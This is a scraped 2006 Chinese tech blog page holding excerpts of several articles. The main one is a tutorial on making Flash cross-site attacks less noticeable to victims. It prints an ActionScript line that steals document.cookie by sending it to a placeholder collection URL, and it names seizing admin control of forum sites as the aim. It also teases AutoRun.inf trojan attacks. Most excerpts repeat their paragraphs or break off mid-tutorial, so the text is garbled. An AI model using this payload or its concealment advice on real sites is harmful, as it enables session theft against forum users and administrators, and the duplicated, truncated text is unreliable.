不错呦!smile@林凯西,确保“准备文件”中的几个文件都有安装,S...您好,看了您这篇帖子觉得很有帮助。但是有个问题想请...我的修改过了怎么还被恶意注册呢 @jjjjiiii 用PJ快9年了,主要是A...PJ3啊,貌似很少有人用PJ了,现在不是WP就是z...@332347365,我当时接入时错误码没有-10...楼主,ChkValue值应为-103是什么意思呢?...大哥 你最近能看到我发的信息,请跟我联系,我有个制...
防止Flash跨站攻击弹出IE窗口
编辑:admin 日期:2006-06-28
前些天一直忙着学习WIN32汇编,一直懒得写文章,这些天来好像Flash跨站攻击闹的挺凶的,但在实施Flash跨站攻击时的那个弹出的IE窗口很容易引起别人的怀疑,而使得Flash跨站攻击失败,这的确让人多少有点头疼,大家是不是也一直在寻找实施Flash跨站攻击时不弹出IE窗口的方法来隐藏自己的攻击行为呢?下面大家和我一起来解决这个不大不小的问题,让Flash跨站攻击更完美吧!
一般来说大家在进行Flash跨站攻击时都是自己做一个Flash动画,并在第一帧中加入用于跳转到其他URL的AtionScript脚本函数,如下:
getURL("BLOCKED SCRIPTwindow.open(’http://用于收集Cookie的网页地址?’+document cookie)","_self") 然后把这个Flash动画置于论坛中的签名、贴子或短信消息中,用来获得管理员或用户的Cookie,从而得到管理权限,进一步伺机控制整个站点,最终达到自己的目的。我们可以看到在整个跨站攻击中最重要的就是这个AtionScript脚本啦!也就是这个脚本中用到的代码打开了一个我们又爱又恨的窗口,所以我们也只能从改造这个脚本代码来实现隐藏或者是去掉弹出的IE窗口,除此外别无它法!
我们先分析一下上面的AtionScript脚本,它使用AtionScript脚本函数"getURL"跳转到一个使用JavaScript协议的URL(JavaScript协议后面就是我们非常熟悉的JavaScript脚本代码),在JavaScript中使用document.cookie的到Cookie,并把Cookie和一个用于收集Cookie的网页地址连成一个http协议的URL地址,最后使用window.open打开合成的URL地址,从而把Cookie用GET方式发送到用于收集Cookie的网页,并记录下来。
通过上面的分析我们进一步了解那个弹出的IE窗口是由于JavaScript协议中的代码window.open所生成的,相信大家都知道window.open的第二个参数用来指定打开的窗口的名字,其通用名称有"_media (IE6.0 在浏览器左边的媒体面板内打开)"、"_blank (在新窗口中打开)"、"_parent (在当前框架的父框架内打开。假如当前框架无父框架,此参数值等同于 _self)"、"_search (IE5.0 在浏览器左边的搜索面板内打开)"、"_self(在当前窗口中打开,覆盖当前文档)"、"_top (在所有框架之外的最顶层窗口中打开 。假如当前窗口无框架结构,此参数值等同于 _self )"等几种,如果我们以"_search"来打开窗口,不是就没有了弹出的IE窗口了吗?AtionScript脚本改为:
一般来说大家在进行Flash跨站攻击时都是自己做一个Flash动画,并在第一帧中加入用于跳转到其他URL的AtionScript脚本函数,如下:
getURL("BLOCKED SCRIPTwindow.open(’http://用于收集Cookie的网页地址?’+document cookie)","_self") 然后把这个Flash动画置于论坛中的签名、贴子或短信消息中,用来获得管理员或用户的Cookie,从而得到管理权限,进一步伺机控制整个站点,最终达到自己的目的。我们可以看到在整个跨站攻击中最重要的就是这个AtionScript脚本啦!也就是这个脚本中用到的代码打开了一个我们又爱又恨的窗口,所以我们也只能从改造这个脚本代码来实现隐藏或者是去掉弹出的IE窗口,除此外别无它法!
我们先分析一下上面的AtionScript脚本,它使用AtionScript脚本函数"getURL"跳转到一个使用JavaScript协议的URL(JavaScript协议后面就是我们非常熟悉的JavaScript脚本代码),在JavaScript中使用document.cookie的到Cookie,并把Cookie和一个用于收集Cookie的网页地址连成一个http协议的URL地址,最后使用window.open打开合成的URL地址,从而把Cookie用GET方式发送到用于收集Cookie的网页,并记录下来。
通过上面的分析我们进一步了解那个弹出的IE窗口是由于JavaScript协议中的代码window.open所生成的,相信大家都知道window.open的第二个参数用来指定打开的窗口的名字,其通用名称有"_media (IE6.0 在浏览器左边的媒体面板内打开)"、"_blank (在新窗口中打开)"、"_parent (在当前框架的父框架内打开。假如当前框架无父框架,此参数值等同于 _self)"、"_search (IE5.0 在浏览器左边的搜索面板内打开)"、"_self(在当前窗口中打开,覆盖当前文档)"、"_top (在所有框架之外的最顶层窗口中打开 。假如当前窗口无框架结构,此参数值等同于 _self )"等几种,如果我们以"_search"来打开窗口,不是就没有了弹出的IE窗口了吗?AtionScript脚本改为:
HTML中小meta的大作用
编辑:admin 日期:2006-06-28
meta是用来在HTML文档中模拟HTTP协议的响应头报文。meta 标签用于网页的<head>与</head>中,meta 标签的用处很多。meta 的属性有两种:name和http-equiv。name属性主要用于描述网页,对应于content(网页内容),以便于搜索引擎机器人查找、分类(目前几乎所有的搜索引擎都使用网上机器人自动查找meta值来给网页分类)。这其中最重要的是description(站点在搜索引擎上的描述)和keywords(分类关键词),所以应该给每页加一个meta值。比较常用的有以下几个:
一、name 属性
1、<meta name="Generator" contect="">用以说明生成工具(如Microsoft FrontPage 4.0)等;
一、name 属性
1、<meta name="Generator" contect="">用以说明生成工具(如Microsoft FrontPage 4.0)等;
Flash player 终止了一项可能不安全的操作!
编辑:admin 日期:2006-06-28
Dreamweaver如何快速切换到父框架等技巧
编辑:admin 日期:2006-06-28
访问时提示:"超出系统资源"
编辑:admin 日期:2006-06-28
如何根据名称识别计算机病毒
编辑:admin 日期:2006-06-28
很多时候大家已经用杀毒软件查出了自己的机子中了例如Backdoor.RmtBomb.12 、Trojan.Win32.SendIP.15 等等这些一串英文还带数字的病毒名,这时有些人就懵了,那么长一串的名字,我怎么知道是什么病毒啊?
其实只要我们掌握一些病毒的命名规则,我们就能通过杀毒软件的报告中出现的病毒名来判断该病毒的一些公有的特性了。
世界上那么多的病毒,反病毒公司为了方便管理,他们会按照病毒的特性,将病毒进行分类命名。虽然每个反病毒公司的命名规则都不太一样,但大体都是采用一个统一的命名方法来命名的。一般格式为:<病毒前缀>.<病毒名>.<病毒后缀> 。
其实只要我们掌握一些病毒的命名规则,我们就能通过杀毒软件的报告中出现的病毒名来判断该病毒的一些公有的特性了。
世界上那么多的病毒,反病毒公司为了方便管理,他们会按照病毒的特性,将病毒进行分类命名。虽然每个反病毒公司的命名规则都不太一样,但大体都是采用一个统一的命名方法来命名的。一般格式为:<病毒前缀>.<病毒名>.<病毒后缀> 。
解析来自Autorun.inf文件的攻击
编辑:admin 日期:2006-06-28
最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中木马的方法,由于AutoRun.inf文件在黑客技术中的应用还是很少见的,相应的资料也不多,有很多人对此觉得很神秘,本文试图为您解开这个迷,使您能完全的了解这个并不复杂却极其有趣的技术。
一、理论基础
经常使用光盘的朋友都知道,有很多光盘放入光驱就会自动运行,它们是怎么做的呢?光盘一放入光驱就会自动被执行,主要依靠两个文件,一是光盘上的AutoRun.inf文件,另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作,如果有的话,便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。
一、理论基础
经常使用光盘的朋友都知道,有很多光盘放入光驱就会自动运行,它们是怎么做的呢?光盘一放入光驱就会自动被执行,主要依靠两个文件,一是光盘上的AutoRun.inf文件,另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作,如果有的话,便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。
网页Flash出现虚边框问题
编辑:admin 日期:2006-06-28
XP系统中安全放心地运行可疑程序
编辑:admin 日期:2006-06-28
其实,你并不需要让你的病毒防护工具整天运行着,也不需要对你下载的软件总是十分警惕。因为,如果你对将要运行或安装程序的安全性感到怀疑时,你可以利用Windows XP的一个功能来帮助你,通过它来有限制地运行或安装一个可疑程序。
具体的操作方法是,右键单击要运行的程序或是安装程序,然后在弹出的菜单中选择“运行方式”(如下图所示)。我们注意到,在某种情况下(比如说曾经运行过的文件)并没有“运行方式”一项,这就需要在按住Shift键的同时再右键单击程序图标。
在“运行方式”对话框中,选择“当前用户”,并确保“保护我的计算机...”一项被选中,最后单击“确定”按钮。
具体的操作方法是,右键单击要运行的程序或是安装程序,然后在弹出的菜单中选择“运行方式”(如下图所示)。我们注意到,在某种情况下(比如说曾经运行过的文件)并没有“运行方式”一项,这就需要在按住Shift键的同时再右键单击程序图标。
在“运行方式”对话框中,选择“当前用户”,并确保“保护我的计算机...”一项被选中,最后单击“确定”按钮。